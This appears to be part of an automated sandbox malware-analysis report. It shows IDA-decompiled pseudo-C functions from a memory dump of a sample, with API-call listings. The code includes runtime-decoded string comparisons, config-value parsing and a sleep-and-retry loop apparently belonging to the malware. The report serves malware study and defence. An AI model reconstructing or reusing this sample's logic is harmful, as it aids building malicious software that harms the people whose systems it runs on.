    						_t101 =  *((intOrPtr*)( *((intOrPtr*)( *_t99 + 0x34))))(_t99,  &_v8);
    						__eflags = _t101;
    						if(_t101 < 0) {
    							goto L30;
    						} else {
    							__eflags = _t101 - 1;
    							if(_t101 == 1) {
    								_t90 = _v20;
    								_v28 = 1;
    							} else {
    								while(1) {
    									_t102 = _v12;
    									__eflags = _t102;
    									if(_t102 != 0) {
    										__imp__#6(_t102);
    									}
    									_t103 = _v16;
    									_v12 = 0;
    									__eflags = _t103;
    									if(_t103 != 0) {
    										__imp__#6(_t103);
    									}
    									_t104 = _v8;
    									_v16 = 0;
    									_t106 =  *((intOrPtr*)( *((intOrPtr*)( *_t104 + 0xa4))))(_t104,  &_v12);
    									__eflags = _t106;
    									if(_t106 < 0) {
    										goto L30;
    									}
    									_t107 = _v8;
    									__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t107 + 0x68))))(_t107,  &_v16);
    									if(__eflags < 0) {
    										goto L30;
    									} else {
    										E00399090(__eflags,  &_v228, 0x75);
    										_t163 =  *0x3b8628; // 0x593938
    										_t210 = _t209 + 8;
    										__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t163 + 0xe0))))(_v12,  &_v228);
    										if(__eflags != 0) {
    											E00399090(__eflags,  &_v228, 0x77);
    											_t192 =  *0x3b8628; // 0x593938
    											_t211 = _t210 + 8;
    											__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t192 + 0xe0))))(_v12,  &_v228);
    											if(__eflags != 0) {
    												E00399090(__eflags,  &_v228, 0x78);
    												_t119 =  *0x3b8628; // 0x593938
    												_t209 = _t211 + 8;
    												__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t119 + 0xe0))))(_v12,  &_v228);
    												if(__eflags != 0) {
    													E00399090(__eflags,  &_v228, 0x79);
    													_t123 =  *0x3b8628; // 0x593938
    													_t209 = _t209 + 8;
    													__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0xe0))))(_v12,  &_v228);
    													if(__eflags != 0) {
    														E00399090(__eflags,  &_v228, 0x7a);
    														_t127 =  *0x3b8628; // 0x593938
    														_t209 = _t209 + 8;
    														__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t127 + 0xe0))))(_v12,  &_v228);
    														if(__eflags != 0) {
    															E00399090(__eflags,  &_v228, 0x7b);
    															_t131 =  *0x3b8628; // 0x593938
    															_t209 = _t209 + 8;
    															_t132 =  *((intOrPtr*)( *((intOrPtr*)(_t131 + 0xe0))))(_v12,  &_v228);
    															__eflags = _t132;
    															if(_t132 != 0) {
    																goto L26;
    															} else {
    																_t139 = E00393070(0, _t206, _t206, _t207, _v8);
    																goto L25;
    															}
    														} else {
    															_t139 = E00392220(_t206, _t206, _t207, _v8);
    															goto L25;
    														}
    													} else {
    														_t139 = E003953E0(_t206, _t206, _t207, _v8);
    														L25:
    														__eflags = _t139;
    														if(_t139 == 0) {
    															goto L30;
    														} else {
    															goto L26;
    														}
    													}
    												} else {
    													_t140 =  *((intOrPtr*)(_t206 + 0x2c));
    													__eflags = _t140;
    													if(_t140 != 0) {
    														_t140 = E0039BB40(_t140);
    														_t209 = _t209 + 4;
    													}
    													__imp__#2(_v16);
    													 *((intOrPtr*)(_t206 + 0x2c)) = _t140;
    													goto L26;
    												}
    											} else {
    												E00399090(__eflags,  &_v228, 0x76);
    												_t179 =  *0x3b8628; // 0x593938
    												_t209 = _t211 + 8;
    												_t143 =  *((intOrPtr*)( *((intOrPtr*)(_t179 + 0xe0))))(_v16,  &_v228);
    												asm("sbb eax, eax");
    												 *((intOrPtr*)(_t206 + 0x18)) =  ~_t143 + 1;
    												goto L26;
    											}
    										} else {
    											E00399090(__eflags,  &_v228, 0x76);
    											_t148 =  *0x3b8628; // 0x593938
    											_t209 = _t210 + 8;
    											_t149 =  *((intOrPtr*)( *((intOrPtr*)(_t148 + 0xe0))))(_v16,  &_v228);
    											asm("sbb eax, eax");
    											 *((intOrPtr*)(_t206 + 0x14)) =  ~_t149 + 1;
    											L26:
    											_t133 = _v8;
    											_t207 =  *((intOrPtr*)( *((intOrPtr*)( *_t133 + 0x40))))(_t133,  &_v20);
    											__eflags = _t207;
    											if(_t207 < 0) {
    												goto L30;
    											} else {
    												_t136 = _v8;
    												 *((intOrPtr*)( *((intOrPtr*)( *_t136 + 8))))(_t136);
    												_v8 = _v20;
    												_t90 = 0;
    												_v20 = 0;
    												__eflags = _t207 - 1;
    												if(_t207 != 1) {
    													continue;
    												} else {
    													_v28 = _t207;
    												}
    											}
    										}
    									}
    									goto L31;
    								}
    								goto L30;
    							}
    						}
    					}
    					L31:
    					__eflags = _t90;
    					if(_t90 != 0) {
    						 *((intOrPtr*)( *((intOrPtr*)( *_t90 + 8))))(_t90);
    					}
    					_t91 = _v16;
    					__eflags = _t91;
    					if(_t91 != 0) {
    						__imp__#6(_t91);
    					}
    					_t92 = _v12;
    					__eflags = _t92;
    					if(_t92 != 0) {
    						__imp__#6(_t92);
    					}
    					_t93 = _v8;
    					__eflags = _t93;
    					if(_t93 != 0) {
    						 *((intOrPtr*)( *((intOrPtr*)( *_t93 + 8))))(_t93);
    					}
    					_t94 = _v24;
    					__eflags = _t94;
    					if(_t94 != 0) {
    						 *((intOrPtr*)( *((intOrPtr*)( *_t94 + 8))))(_t94);
    					}
    					return _v28;
    				} else {
    					return 0;
    				}
    			}

    APIs
    • SysFreeString.OLEAUT32(?), ref: 003983EC
    • SysAllocString.OLEAUT32(?), ref: 00398541
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    • SysFreeString.OLEAUT32(?), ref: 003983FD
      • Part of subcall function 00393070: SysFreeString.OLEAUT32(?), ref: 003930C8
      • Part of subcall function 00393070: SysFreeString.OLEAUT32(?), ref: 003930DD
      • Part of subcall function 00393070: SysFreeString.OLEAUT32(?), ref: 00393240
      • Part of subcall function 00393070: SysFreeString.OLEAUT32(?), ref: 0039324E
      • Part of subcall function 00392220: SysFreeString.OLEAUT32(?), ref: 003922D8
      • Part of subcall function 00392220: SysFreeString.OLEAUT32(?), ref: 003923DB
      • Part of subcall function 003953E0: SysFreeString.OLEAUT32(?), ref: 0039549E
      • Part of subcall function 003953E0: SysFreeString.OLEAUT32(?), ref: 003954AF
      • Part of subcall function 003953E0: _wtoi.MSVCRT ref: 003955BB
      • Part of subcall function 003953E0: SysFreeString.OLEAUT32(?), ref: 00395605
      • Part of subcall function 003953E0: SysFreeString.OLEAUT32(?), ref: 00395613
    • SysFreeString.OLEAUT32(?), ref: 0039865C
    • SysFreeString.OLEAUT32(?), ref: 0039866A
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 63%
    			E003953E0(intOrPtr __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
    				void* _v8;
    				char _v12;
    				char _v16;
    				signed int _v20;
    				void* _v24;
    				signed int _v28;
    				char _v36;
    				signed int _v40;
    				short _v44;
    				intOrPtr _v48;
    				char _v248;
    				void* __ebx;
    				intOrPtr _t80;
    				intOrPtr _t81;
    				intOrPtr* _t82;
    				intOrPtr* _t83;
    				intOrPtr* _t90;
    				intOrPtr _t94;
    				char _t95;
    				char _t96;
    				intOrPtr* _t97;
    				intOrPtr* _t99;
    				void* _t101;
    				intOrPtr* _t105;
    				void* _t110;
    				void* _t113;
    				void* _t116;
    				intOrPtr _t119;
    				void* _t122;
    				intOrPtr _t140;
    				intOrPtr _t166;
    				void* _t168;
    				intOrPtr* _t170;
    				intOrPtr* _t172;
    				void* _t173;
    				void* _t174;
    				void* _t175;
    				void* _t176;
    				void* _t177;
    
    				_t166 = __ecx;
    				_v48 = __ecx;
    				_v20 = 0;
    				_v12 = 0;
    				_v16 = 0;
    				_v40 = 0;
    				_v8 = 0;
    				_v28 = 0;
    				_v24 = 0;
    				_v44 = 0;
    				E0039BB30( &_v36);
    				E00395230(__ecx, __ecx);
    				_t170 = _a4;
    				_push( &_v44);
    				_push(_t170);
    				if( *((intOrPtr*)( *((intOrPtr*)( *_t170 + 0x58))))() >= 0) {
    					if(_v44 != 0xffff) {
    						L21:
    						_v28 = 1;
    						 *((intOrPtr*)(_t166 + 0x20)) = _v20;
    						 *((intOrPtr*)(_t166 + 0x28)) = _v40;
    					} else {
    						_push( &_v24);
    						_push(_t170);
    						if( *((intOrPtr*)( *((intOrPtr*)( *_t170 + 0x30))))() >= 0) {
    							_t90 = _v24;
    							_push( &_v20);
    							_push(_t90);
    							if( *((intOrPtr*)( *((intOrPtr*)( *_t90 + 0x20))))() >= 0) {
    								_t94 = E003A1D90(_v20 + _v20 * 2 + _v20 + _v20 * 2 + _v20 + _v20 * 2 + _v20 + _v20 * 2 + _v20 + _v20 * 2 + _v20 + _v20 * 2 + _v20 + _v20 * 2 + _v20 + _v20 * 2, 0);
    								_t174 = _t173 + 8;
    								_v40 = _t94;
    								if(_t94 != 0) {
    									_t168 = 0;
    									if(_v20 <= 0) {
    										L20:
    										_t166 = _v48;
    										goto L21;
    									} else {
    										_t25 = _t94 + 8; // 0x8
    										_t172 = _t25;
    										while(1) {
    											_t95 = _v12;
    											if(_t95 != 0) {
    												__imp__#6(_t95);
    											}
    											_t96 = _v16;
    											_v12 = 0;
    											if(_t96 != 0) {
    												__imp__#6(_t96);
    											}
    											_t97 = _v24;
    											_push( &_v8);
    											_v16 = 0;
    											_push(_t168);
    											_push(_t97);
    											if( *((intOrPtr*)( *((intOrPtr*)( *_t97 + 0x1c))))() < 0) {
    												goto L22;
    											}
    											_t99 = _v8;
    											_t101 =  *((intOrPtr*)( *((intOrPtr*)( *_t99 + 0xa4))))(_t99,  &_v12);
    											_t187 = _t101;
    											if(_t101 >= 0) {
    												E00399090(_t187,  &_v248, 0x7e);
    												_t140 =  *0x3b8628; // 0x593938
    												_t174 = _t174 + 8;
    												_push( &_v248);
    												_push(_v12);
    												if( *((intOrPtr*)( *((intOrPtr*)(_t140 + 0xe0))))() != 0) {
    													L19:
    													_t105 = _v8;
    													 *((intOrPtr*)( *((intOrPtr*)( *_t105 + 8))))(_t105);
    													_t168 = _t168 + 1;
    													_t172 = _t172 + 0x18;
    													_v8 = 0;
    													if(_t168 < _v20) {
    														continue;
    													} else {
    														goto L20;
    													}
    												} else {
    													E0039B1E0(0,  &_v36);
    													_t110 = E0039A140( &_v36, _v8);
    													_t189 = _t110;
    													if(_t110 != 0) {
    														E00399090(_t189,  &_v248, 0x27);
    														_t175 = _t174 + 8;
    														_t44 = _t172 - 8; // 0x0
    														_t113 = E00391A10( &_v36,  &_v248, _t44);
    														_t190 = _t113;
    														if(_t113 != 0) {
    															E00399090(_t190,  &_v248, 0x7f);
    															_t176 = _t175 + 8;
    															_t48 = _t172 - 4; // 0x4
    															_t116 = E00391A10( &_v36,  &_v248, _t48);
    															_t191 = _t116;
    															if(_t116 != 0) {
    																E00399090(_t191,  &_v248, 0x80);
    																_t177 = _t176 + 8;
    																_t119 = E00391A10( &_v36,  &_v248,  &_v16);
    																if(_t119 != 0) {
    																	__imp___wtoi(_v16);
    																	_t174 = _t177 + 4;
    																	 *_t172 = _t119;
    																	 *((intOrPtr*)(_t172 + 8)) = 0;
    																	 *((intOrPtr*)(_t172 + 0xc)) = 0;
    																	goto L19;
    																}
    															}
    														}
    													}
    												}
    											}
    											goto L22;
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    				L22:
    				_t80 = _v12;
    				if(_t80 != 0) {
    					__imp__#6(_t80);
    				}
    				_t81 = _v16;
    				if(_t81 != 0) {
    					__imp__#6(_t81);
    				}
    				_t82 = _v8;
    				if(_t82 != 0) {
    					 *((intOrPtr*)( *((intOrPtr*)( *_t82 + 8))))(_t82);
    				}
    				_t83 = _v24;
    				_pop(_t122);
    				if(_t83 != 0) {
    					 *((intOrPtr*)( *((intOrPtr*)( *_t83 + 8))))(_t83);
    				}
    				L003926B0(_t122,  &_v36);
    				return _v28;
    			}

    APIs
      • Part of subcall function 00395230: SysFreeString.OLEAUT32(00000000), ref: 00395247
      • Part of subcall function 00395230: SysFreeString.OLEAUT32(00000001), ref: 00395255
    • SysFreeString.OLEAUT32(?), ref: 0039549E
    • SysFreeString.OLEAUT32(?), ref: 003954AF
      • Part of subcall function 0039B1E0: SysFreeString.OLEAUT32(?), ref: 0039B1F8
      • Part of subcall function 0039B1E0: SysFreeString.OLEAUT32(?), ref: 0039B201
    • _wtoi.MSVCRT ref: 003955BB
    • SysFreeString.OLEAUT32(?), ref: 00395605
    • SysFreeString.OLEAUT32(?), ref: 00395613
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 64%
    			E00399D50(intOrPtr __ecx) {
    				void* _v8;
    				void* _v12;
    				void* _v16;
    				void* _v20;
    				char _v24;
    				char _v28;
    				char _v228;
    				intOrPtr* _t59;
    				intOrPtr* _t61;
    				intOrPtr* _t62;
    				intOrPtr* _t63;
    				intOrPtr* _t64;
    				intOrPtr* _t65;
    				intOrPtr* _t69;
    				intOrPtr* _t74;
    				intOrPtr* _t75;
    				intOrPtr* _t77;
    				intOrPtr* _t78;
    				intOrPtr* _t79;
    				intOrPtr* _t80;
    				intOrPtr* _t82;
    				intOrPtr* _t83;
    				intOrPtr* _t91;
    				intOrPtr* _t92;
    				intOrPtr* _t95;
    				intOrPtr* _t99;
    				intOrPtr _t100;
    				intOrPtr _t102;
    				intOrPtr _t109;
    				intOrPtr _t114;
    				intOrPtr _t116;
    				intOrPtr* _t130;
    				intOrPtr* _t138;
    				void* _t139;
    				void* _t140;
    				void* _t141;
    
    				_t102 = __ecx;
    				_v20 = 0;
    				_v8 = 0;
    				_v24 = 0;
    				_v12 = 0;
    				_v16 = 0;
    				_v28 = 0;
    				E0039D6A0(__ecx);
    				_t59 =  *((intOrPtr*)(__ecx + 4));
    				if(_t59 != 0) {
    					_t61 =  *((intOrPtr*)( *((intOrPtr*)( *_t59 + 0xb4))))(_t59,  &_v20);
    					__eflags = _t61;
    					if(_t61 >= 0) {
    						_t69 = _v20;
    						__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t69 + 0xa4))))(_t69,  &_v12);
    						if(__eflags >= 0) {
    							E00399090(__eflags,  &_v228, 0x45);
    							_t109 =  *0x3b8628; // 0x593938
    							_t140 = _t139 + 8;
    							_t74 =  *((intOrPtr*)( *((intOrPtr*)(_t109 + 0xe0))))(_v12,  &_v228);
    							__eflags = _t74;
    							if(_t74 == 0) {
    								_t75 = _v20;
    								_t77 =  *((intOrPtr*)( *((intOrPtr*)( *_t75 + 0x34))))(_t75,  &_v8);
    								__eflags = _t77;
    								if(_t77 >= 0) {
    									__eflags = _t77 - 1;
    									if(_t77 == 1) {
    										L20:
    										_v28 = 1;
    									} else {
    										while(1) {
    											_t78 = _v12;
    											__eflags = _t78;
    											if(_t78 != 0) {
    												__imp__#6(_t78);
    											}
    											_t79 = _v16;
    											_v12 = 0;
    											__eflags = _t79;
    											if(_t79 != 0) {
    												__imp__#6(_t79);
    											}
    											_t80 = _v8;
    											_v16 = 0;
    											_t82 =  *((intOrPtr*)( *((intOrPtr*)( *_t80 + 0xa4))))(_t80,  &_v12);
    											__eflags = _t82;
    											if(_t82 < 0) {
    												goto L21;
    											}
    											_t83 = _v8;
    											__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t83 + 0x68))))(_t83,  &_v16);
    											if(__eflags >= 0) {
    												E00399090(__eflags,  &_v228, 0x46);
    												_t114 =  *0x3b8628; // 0x593938
    												_t141 = _t140 + 8;
    												_t130 =  *((intOrPtr*)(_t114 + 0xe0));
    												__eflags =  *_t130(_v12,  &_v228);
    												if(__eflags != 0) {
    													E00399090(__eflags,  &_v228, 0x47);
    													_t116 =  *0x3b8628; // 0x593938
    													_t140 = _t141 + 8;
    													_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t116 + 0xe0))))(_v12,  &_v228);
    													__eflags = _t91;
    													if(_t91 != 0) {
    														goto L18;
    													} else {
    														_t99 = E0039BF60(_t102, _v8);
    														__eflags = _t99;
    														if(_t99 != 0) {
    															goto L18;
    														}
    													}
    												} else {
    													_t100 = _v16;
    													__imp___wtoi(_t100);
    													asm("cdq");
    													_t140 = _t141 + 4;
    													 *((intOrPtr*)(_t102 + 0x10)) = _t100;
    													 *((intOrPtr*)(_t102 + 0x14)) = _t130;
    													L18:
    													_t92 = _v8;
    													_t138 =  *((intOrPtr*)( *((intOrPtr*)( *_t92 + 0x40))))(_t92,  &_v24);
    													__eflags = _t138;
    													if(_t138 >= 0) {
    														_t95 = _v8;
    														 *((intOrPtr*)( *((intOrPtr*)( *_t95 + 8))))(_t95);
    														_v8 = _v24;
    														_v24 = 0;
    														__eflags = _t138 - 1;
    														if(_t138 != 1) {
    															continue;
    														} else {
    															goto L20;
    														}
    													}
    												}
    											}
    											goto L21;
    										}
    									}
    									L21:
    								}
    							}
    						}
    					}
    					_t62 = _v16;
    					__eflags = _t62;
    					if(_t62 != 0) {
    						__imp__#6(_t62);
    					}
    					_t63 = _v12;
    					__eflags = _t63;
    					if(_t63 != 0) {
    						__imp__#6(_t63);
    					}
    					_t64 = _v8;
    					__eflags = _t64;
    					if(_t64 != 0) {
    						 *((intOrPtr*)( *((intOrPtr*)( *_t64 + 8))))(_t64);
    					}
    					_t65 = _v20;
    					__eflags = _t65;
    					if(_t65 != 0) {
    						 *((intOrPtr*)( *((intOrPtr*)( *_t65 + 8))))(_t65);
    					}
    					return _v28;
    				} else {
    					return 0;
    				}
    			}

    APIs
    • SysFreeString.OLEAUT32(?), ref: 00399E18
    • SysFreeString.OLEAUT32(?), ref: 00399E29
    • _wtoi.MSVCRT ref: 00399E95
      • Part of subcall function 0039BF60: SysFreeString.OLEAUT32(?), ref: 0039C049
      • Part of subcall function 0039BF60: SysFreeString.OLEAUT32(?), ref: 0039C05E
      • Part of subcall function 0039BF60: _wtoi.MSVCRT ref: 0039C115
      • Part of subcall function 0039BF60: rand.MSVCRT ref: 0039C160
      • Part of subcall function 0039BF60: SysFreeString.OLEAUT32(?), ref: 0039C2AE
      • Part of subcall function 0039BF60: SysFreeString.OLEAUT32(?), ref: 0039C2BC
    • SysFreeString.OLEAUT32(?), ref: 00399F26
    • SysFreeString.OLEAUT32(?), ref: 00399F34
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 65%
    			E003928E0(intOrPtr __ecx) {
    				void* _v8;
    				void* _v12;
    				void* _v16;
    				void* _v20;
    				char _v24;
    				char _v28;
    				intOrPtr _v32;
    				char _v232;
    				intOrPtr* _t54;
    				intOrPtr* _t56;
    				intOrPtr* _t57;
    				intOrPtr* _t58;
    				intOrPtr* _t59;
    				intOrPtr* _t60;
    				intOrPtr* _t66;
    				intOrPtr* _t71;
    				intOrPtr* _t72;
    				intOrPtr* _t74;
    				intOrPtr* _t75;
    				intOrPtr* _t76;
    				intOrPtr* _t77;
    				intOrPtr* _t79;
    				intOrPtr* _t80;
    				intOrPtr* _t85;
    				intOrPtr* _t86;
    				intOrPtr* _t89;
    				intOrPtr _t92;
    				void* _t96;
    				intOrPtr* _t97;
    				intOrPtr _t105;
    				intOrPtr _t110;
    				intOrPtr _t127;
    				intOrPtr* _t128;
    				void* _t129;
    				void* _t130;
    
    				_t127 = __ecx;
    				_t54 =  *((intOrPtr*)(__ecx + 4));
    				_v32 = __ecx;
    				_v20 = 0;
    				_v8 = 0;
    				_v24 = 0;
    				_v12 = 0;
    				_v16 = 0;
    				_v28 = 0;
    				if(_t54 != 0) {
    					_t56 =  *((intOrPtr*)( *((intOrPtr*)( *_t54 + 0xb4))))(_t54,  &_v20, _t96);
    					_t97 = __imp__#6;
    					__eflags = _t56;
    					if(_t56 >= 0) {
    						_t66 = _v20;
    						__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t66 + 0xa4))))(_t66,  &_v12);
    						if(__eflags >= 0) {
    							E00399090(__eflags,  &_v232, 0xa3);
    							_t105 =  *0x3b8628; // 0x593938
    							_t130 = _t129 + 8;
    							_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t105 + 0xe0))))(_v12,  &_v232);
    							__eflags = _t71;
    							if(_t71 == 0) {
    								_t72 = _v20;
    								_t74 =  *((intOrPtr*)( *((intOrPtr*)( *_t72 + 0x34))))(_t72,  &_v8);
    								__eflags = _t74;
    								if(_t74 >= 0) {
    									__eflags = _t74 - 1;
    									if(_t74 == 1) {
    										L19:
    										_v28 = 1;
    									} else {
    										while(1) {
    											_t75 = _v12;
    											__eflags = _t75;
    											if(_t75 != 0) {
    												 *_t97(_t75);
    											}
    											_t76 = _v16;
    											__eflags = _t76;
    											if(_t76 != 0) {
    												 *_t97(_t76);
    											}
    											_t77 = _v8;
    											_v12 = 0;
    											_v16 = 0;
    											_t79 =  *((intOrPtr*)( *((intOrPtr*)( *_t77 + 0xa4))))(_t77,  &_v12);
    											__eflags = _t79;
    											if(_t79 < 0) {
    												goto L20;
    											}
    											_t80 = _v8;
    											__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t80 + 0x68))))(_t80,  &_v16);
    											if(__eflags >= 0) {
    												E00399090(__eflags,  &_v232, 0xa4);
    												_t110 =  *0x3b8628; // 0x593938
    												_t130 = _t130 + 8;
    												_t85 =  *((intOrPtr*)( *((intOrPtr*)(_t110 + 0xe0))))(_v12,  &_v232);
    												__eflags = _t85;
    												if(_t85 == 0) {
    													_t92 = _v16;
    													__imp___wtoi(_t92);
    													_t130 = _t130 + 4;
    													 *((intOrPtr*)(_t127 + 0x10)) = _t92;
    												}
    												_t86 = _v8;
    												_t128 =  *((intOrPtr*)( *((intOrPtr*)( *_t86 + 0x40))))(_t86,  &_v24);
    												__eflags = _t128;
    												if(_t128 >= 0) {
    													_t89 = _v8;
    													 *((intOrPtr*)( *((intOrPtr*)( *_t89 + 8))))(_t89);
    													_v8 = _v24;
    													_v24 = 0;
    													__eflags = _t128 - 1;
    													if(_t128 != 1) {
    														_t127 = _v32;
    														continue;
    													} else {
    														goto L19;
    													}
    												}
    											}
    											goto L20;
    										}
    									}
    								}
    							}
    						}
    					}
    					L20:
    					_t57 = _v16;
    					__eflags = _t57;
    					if(_t57 != 0) {
    						 *_t97(_t57);
    					}
    					_t58 = _v12;
    					__eflags = _t58;
    					if(_t58 != 0) {
    						 *_t97(_t58);
    					}
    					_t59 = _v8;
    					__eflags = _t59;
    					if(_t59 != 0) {
    						 *((intOrPtr*)( *((intOrPtr*)( *_t59 + 8))))(_t59);
    					}
    					_t60 = _v20;
    					__eflags = _t60;
    					if(_t60 != 0) {
    						 *((intOrPtr*)( *((intOrPtr*)( *_t60 + 8))))(_t60);
    					}
    					return _v28;
    				} else {
    					return 0;
    				}
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 96%
    			E003945F3(intOrPtr* __ebx) {
    				intOrPtr _t61;
    				intOrPtr _t63;
    				intOrPtr _t71;
    				intOrPtr* _t81;
    				intOrPtr* _t82;
    				intOrPtr* _t96;
    				intOrPtr _t98;
    				signed int* _t99;
    				intOrPtr* _t101;
    				intOrPtr _t102;
    				intOrPtr _t106;
    				signed int _t110;
    				intOrPtr _t113;
    				intOrPtr _t117;
    				signed int _t120;
    				signed short* _t121;
    				intOrPtr _t127;
    				signed int _t135;
    				signed int _t140;
    				void* _t142;
    				intOrPtr _t143;
    				intOrPtr _t145;
    				intOrPtr* _t146;
    				void* _t147;
    				void* _t149;
    				void* _t150;
    
    				_t101 = __ebx;
    				do {
    					_t61 =  *0x3b8628; // 0x593938
    					 *((intOrPtr*)( *((intOrPtr*)(_t61 + 0xac))))(0x3b8594);
    					if( *(_t147 - 8) < 0) {
    						L13:
    						 *(_t147 - 8) = 0xffffffff;
    						L14:
    						_t63 =  *0x3b8628; // 0x593938
    						 *((intOrPtr*)( *((intOrPtr*)(_t63 + 0xc4))))(0x3b8594);
    						_t22 = _t147 - 8;
    						 *_t22 =  *(_t147 - 8) + 1;
    						if( *_t22 == 0) {
    							_t143 =  *((intOrPtr*)(_t147 - 4));
    							goto L37;
    						}
    						_t140 =  *(_t147 - 0x1c);
    						_t143 = 0;
    						do {
    							_t81 = E003B1280(0, _t147 - 0x41c);
    							_t150 = _t149 + 4;
    							_push(0x1c);
    							if(_t81 == 0) {
    								L0039A47E();
    								_t149 = _t150 + 4;
    								__eflags = _t81;
    								if(_t81 == 0) {
    									L21:
    									_t82 = 0;
    									__eflags = 0;
    									L22:
    									 *((intOrPtr*)(_t147 - 0x10)) = _t82;
    									_push(_t140);
    									_push(_t147 - 0x41c);
    									if( *((intOrPtr*)( *((intOrPtr*)( *_t82 + 8))))() != 0) {
    										 *((intOrPtr*)(_t147 - 4)) = _t143;
    										__eflags = _t143 - 5;
    										if(__eflags >= 0) {
    											L32:
    											_t110 =  *(_t147 - 0xc) + 1;
    											 *(_t147 - 0xc) = _t110;
    											if(_t110 > 0x4b0) {
    												goto L38;
    											}
    											if(_t110 != (0x66666667 * _t110 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t110 >> 0x20 >> 2) + ((0x66666667 * _t110 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t110 >> 0x20 >> 2)) * 4 + (0x66666667 * _t110 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t110 >> 0x20 >> 2) + ((0x66666667 * _t110 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t110 >> 0x20 >> 2)) * 4) {
    												Sleep(0x3e8); // executed
    											} else {
    												_t113 =  *0x3b8628; // 0x593938
    												 *((intOrPtr*)( *((intOrPtr*)(_t113 + 0xc8))))(0xea60);
    											}
    											goto L37;
    										}
    										_t145 = 0;
    										__eflags = 0;
    										while(1) {
    											_t96 = E003990F0(_t101,  *((intOrPtr*)(_t101 + 0x18)), _t140, _t145, _t147 - 0x18,  *_t101,  *((intOrPtr*)(_t101 + 4)),  *((intOrPtr*)(_t101 + 8)),  *((intOrPtr*)(_t101 + 0xc)),  *((intOrPtr*)(_t101 + 0x10)),  *((intOrPtr*)(_t101 + 0x14))); // executed
    											__eflags = _t96;
    											if(__eflags != 0) {
    												break;
    											}
    											_t117 =  *0x3b8628; // 0x593938
    											 *((intOrPtr*)( *((intOrPtr*)(_t117 + 0xc8))))(0x3e8);
    											_t145 = _t145 + 1;
    											__eflags = _t145 - 3;
    											if(__eflags < 0) {
    												continue;
    											}
    											 *((intOrPtr*)(_t147 - 4)) = _t145;
    											L31:
    											_t143 =  *((intOrPtr*)(_t147 - 4));
    											goto L32;
    										}
    										 *((intOrPtr*)(_t147 - 4)) = 0;
    										goto L31;
    									}
    									goto L23;
    								}
    								_t82 = E003B1D30(_t81); // executed
    								goto L22;
    							}
    							L0039A47E();
    							_t149 = _t150 + 4;
    							if(_t81 == 0) {
    								goto L21;
    							}
    							_t82 = L003B1DC0(_t81);
    							goto L22;
    							L23:
    							_t143 = _t143 + 1;
    						} while (_t143 < 5);
    						 *((intOrPtr*)(_t147 - 4)) = _t143;
    						goto L32;
    					}
    					_t102 =  *((intOrPtr*)(_t101 + 0x18));
    					_t98 =  *((intOrPtr*)(_t102 + 8));
    					_t120 =  *(_t147 - 8);
